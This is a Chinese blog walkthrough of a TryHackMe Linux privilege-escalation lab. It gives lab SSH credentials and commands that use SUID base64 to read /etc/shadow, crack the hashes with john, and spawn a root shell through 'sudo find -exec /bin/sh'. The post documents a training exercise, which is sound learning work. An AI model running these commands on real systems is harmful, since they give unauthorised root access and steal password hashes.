thm_Linux_Privilege_Escalation_Challenge

最新推荐文章于 2024-07-19 15:41:30 发布
最新推荐文章于 2024-07-19 15:41:30 发布
阅读量421 收藏 6
点赞数 9
分类专栏: 靶场 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73255659/article/details/136464561
版权

文章目录

信息收集

ssh 连接到 目标机器
您可以通过浏览器访问目标计算机或使用下面的 SSH 凭据。
Username: leonard
Password: Penny123
直接查看 suid 的可执行文件
find / -perm -04000 2>/dev/null

/usr/bin/base64
/usr/bin/ksu
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/Xorg
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/kde4/kpac_dhcp_helper
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/qemu-bridge-helper
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/proxy_child
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/flatpak-bwrap

/usr/bin/base64 带suid的/usr/bin/base64 可以读取 /etc/passwd 和 /etc/shadow

passwd提权

base64 /etc/shadow | base64 --decode
base64 /etc/passwd | base64 --decode

读出来后分别保存在1.txt 和2.txt中
在攻击机器上 unshadow 1.txt 2.txt > 3
直接 john 3 爆破
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
但是无法爆破出root出来我们可以先登录到 missy用户

sudo提权

登陆到missy先找一波flag1.txt
find / -name flag1.txt 2>/dev/null
找到/home/missy/Documents/flag1.txt
再次进行信息收集sudo -l 看看有什么执行文件有sudo权限
/usr/bin/find 只有一个find 本来还想玩玩 LD_PRELOAD 但发现 没有这个env_keep 可惜…
无所谓 find 命令照样提权

sudo find . -exec /bin/sh \; -quit

flag2.txt

root 权限下读取
/home/rootflag/flag2.txt

K1t0
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
THMLinux Privilege Escalation(权限提升)-初级渗透测试
追风少年亚索的博客
04-22 433
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
Basic Linux Privilege Escalation
公众号shadow sock7
09-17 1400
原文链接: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Basic Linux Privilege Escalation Before starting, I would like to point out - I'm no expert. As far as I kno
Privilege Escalation 权限提升
蚁景网安学院
04-07 704
这是 tryhackme 渗透测试章节的最后一个房间。原本想谷歌机翻然后我手工看一下,但是感觉这样练习不了英文,所以全部手工翻译,实在翻不出来再交给谷歌。手工翻译不免存在勘误,建议英文好的读者朋友们直接去阅览原文。
kernel编译错误R_ARM_THM_JUMP19
qq_39525606的博客
07-06 418
解决编译内核时出现的错误:R_ARM_THM_JUMP19
编译报错R_ARM_THM_MOVW_ABS_NC against `a local symbol
csdn66_2016的博客
01-03 7049
我们在编译动态库的时候,会遇到如下错误: /opt/gcc-linaro-arm-linux-gnueabihf/bin/../lib/gcc/arm-linux-gnueabihf/4.7.3/../../../../arm-linux-gnueabihf/bin/ld: adb.o: relocation R_ARM_THM_MOVW_ABS_NC against `a local symb
错误提示 relocation overflow in R_ARM_THM_CALL
auccy的博客
10-09 1282
cocos项目生成apk时,编译报错: relocation overflow in R_ARM_THM_CALL 解决方案:在所有的Android.mk加入LOCAL_ARM_MODE := arm,包括external下的第三方库。 参考:https://forum.cocos.com/t/cocos-3-12-release/38343/4 ...
基本Linux权限提升(Basic Linux Privilege Escalation
Fly_鹏程万里
05-13 2616
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Be...
linux zx命令_linux常用命令小结
weixin_36420854的博客
01-14 466
查询操作系统类型cat /etc/issuecat /etc/redhat-release查询操作系统内核版本cat /proc/version查询服务器信息uname -a查询服务器namehostname查看文本行数、字数、字节数wc(ls -l|wc)输出信息中只显示某一行awkls -l|awd '{print $2}'替换文本中的字符串sed -e 's/newstring/oldst...
thm.zip_The Flash!_图形图象
09-20
标题 "thm.zip_The Flash!_图形图象" 暗示了这是一个与图形图像处理相关的项目,可能涉及到屏幕闪烁效果的实现。这个压缩包包含了一系列的源代码文件,表明它是一个软件开发项目,具体可能是一个用于创建或编辑动画...
Transact_SQL 小手册
09-11
Transact-SQL 小手册 Transact-SQL 是一种专门用于关系数据库管理系统(RDBMS)的编程语言。它是 Structured Query Language(SQL)的扩展,添加了许多程序化功能,用于提高数据库管理和开发效率。...
THM3060_KIT.rar_THM3060_THM3060 M1_THM3060 PCB_th3060 demoboard_
07-14
清华同方可读M1卡芯片资料,和程序,有PCB,原理图,PDF等
MVI_1684.THM.thm
04-04
MVI_1684.THM.thm
THM_writeups:从TryHackMe实验室收集的文章
03-25
THM_writeups 从TryHackMe实验室收集的文章仅用于教育目的。
LINUX:懒汉单例模式线程池
W2155的博客
07-16 437
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 855
COD 原理,CTRL9,自检(详细代码示例)
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 324
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux 注意事项
最新发布
m0_74012211的博客
07-19 310
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
/usr/bin/gcc-linaro-5.3-2016.02-x86_64_arm-linux-gnueabihf/bin/../lib/gcc/arm-linux-gnueabihf/5.3.1/../../../../arm-linux-gnueabihf/bin/ld: buffer_frame.o: relocation R_ARM_THM_MOVW_ABS_NC against `a local symbol' can not be used when making a shared object; recompile with -fPIC buffer_frame.o: error adding symbols: 错误的值 collect2: error: ld returned 1 exit status
06-02
这个错误是由于在编译时缺少 -fPIC 选项导致的。-fPIC 选项是编译动态链接库时必须加上的选项之一。在重新编译时,你需要使用以下命令: ``` gcc -fPIC -c buffer_frame.c -o buffer_frame.o gcc -shared buffer_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值